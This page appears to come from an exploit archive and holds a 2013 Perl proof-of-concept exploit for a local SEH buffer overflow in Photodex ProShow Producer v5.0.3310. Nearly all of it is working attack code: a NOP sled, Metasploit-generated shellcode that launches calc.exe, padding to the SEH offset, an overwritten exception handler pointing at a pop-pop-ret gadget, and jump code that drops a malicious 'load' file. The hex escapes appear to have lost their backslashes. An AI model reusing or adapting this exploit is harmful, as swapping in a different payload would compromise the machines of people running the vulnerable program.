Home / exploits

PDF

Photodex ProShow Producer v5.0.3310 Local Buffer Overflow SEH

Posted on 28 October 2013

#!/usr/bin/perl
  
############################################
############################################
# Exploit Title: Photodex ProShow Producer v5.0.3310 - Local Buffer Overflow (SEH)
# Date: 10-26-2013
# Exploit Author: Mike Czumak (T_v3rn1x) -- @SecuritySift
# Vulnerable Software: Photodex ProShow Producer v5.0.3310
# Software Link: http://files.photodex.com/release/pspro_50_3310.exe
# Version: 5.0.3310
# Tested On: Windows XP SP3
############################################
############################################
# Credits:
#
# Vulnerability identified in v5.0.3256
#       by Julien Ahrens
#       http://www.exploit-db.com/exploits/19563/
#
# Egghunter SEH exploit for v5.0.3256
#       by mr.pr0n
#       http://www.exploit-db.com/exploits/20036/
############################################
############################################
# Details:
# Latest Proshow version confirmed still vulnerable (same offets as exploit by mr.pron)
# This sploit uses a jump to an offset of ESP instead of an egghunter
# The seh exploit looks like this:  shellcode-->junk-->next seh-->seh-->jumpcode
# Replace load file in app folder (e.g. C:Program FilesPhotodexProShow Producer)
###########################################
#############################################
  
my $buffsize = 15000; # keep size of exploit buffer consistent
  
my $shell = "x90" x 100; # since we're jumping ~60 bytes past the start of our buffer
              # start the shellcode with enough nops
  
# Calc.exe payload [size 227]
# msfpayload windows/exec CMD=calc.exe R |
# msfencode -e x86/shikata_ga_nai -c 1 -b 'x00x0ax0dxff'
my $shell = $shell . "xdbxcfxb8x27x17x16x1fxd9x74x24xf4x5fx2bxc9" .
"xb1x33x31x47x17x83xefxfcx03x60x04xf4xeax92" .
"xc2x71x14x6ax13xe2x9cx8fx22x30xfaxc4x17x84" .
"x88x88x9bx6fxdcx38x2fx1dxc9x4fx98xa8x2fx7e" .
"x19x1dxf0x2cxd9x3fx8cx2ex0exe0xadxe1x43xe1" .
"xeax1fxabxb3xa3x54x1ex24xc7x28xa3x45x07x27" .
"x9bx3dx22xf7x68xf4x2dx27xc0x83x66xdfx6axcb" .
"x56xdexbfx0fxaaxa9xb4xe4x58x28x1dx35xa0x1b" .
"x61x9ax9fx94x6cxe2xd8x12x8fx91x12x61x32xa2" .
"xe0x18xe8x27xf5xbax7bx9fxddx3bxafx46x95x37" .
"x04x0cxf1x5bx9bxc1x89x67x10xe4x5dxeex62xc3" .
"x79xabx31x6axdbx11x97x93x3bxfdx48x36x37xef" .
"x9dx40x1ax65x63xc0x20xc0x63xdax2ax62x0cxeb" .
"xa1xedx4bxf4x63x4axa3xbex2exfax2cx67xbbxbf" .
"x30x98x11x83x4cx1bx90x7bxabx03xd1x7exf7x83" .
"x09xf2x68x66x2exa1x89xa3x4dx24x1ax2fxbcxc3" .
"x9axcaxc0";
  
my $junk = "x41" x (9844 - length($shell)); # 9844 is the offset to nseh
my $nseh = "xebx08x90x90"; # overwrite next seh with jmp instruction
my $seh = pack('V',0x1022adc9); # overwrite seh handler with pop ebx pop eax ret 
                                # ASLR: False, Rebase: False, SafeSEH: False, OS: False
                                # C:Program FilesPhotodexProShow Producerif.dnt
  
# we don't have enough space to execute shellcode after the nseh jump
# there is enough space at esp + 1041 which points back to the beginning
# of our buffer so we'll use this limited spaceto increment esp and jump to it
  
my $jmp = "x90" x 20; # start the jmp code with some nops
my $jmp = $jmp . "x41x41"; # align so add esp executes properly
my $jmp = $jmp . "x83xc4x64" x 11; # increment esp before we jump to it; (add esp, 100) x 11 = esp + 1100
my $jmp = $jmp . "xffxe4"; # jmp esp
  
my $sploit = $shell.$junk.$nseh.$seh.$jmp; # concatenate the sploit portion of the buffer
my $fill = "x42" x ($buffsize - length($sploit)); # fill the remainder of the buffer with junk to keep it consistent
my $buffer = $sploit.$fill; # build the final buffer
  
# write the exploit buffer to file
my $file = "load";
open(FILE, ">$file");
print FILE $buffer;
close(FILE);
print "Exploit file [" . $file . "] created
";
print "Buffer size: " . length($buffer) . "
";

 

TOP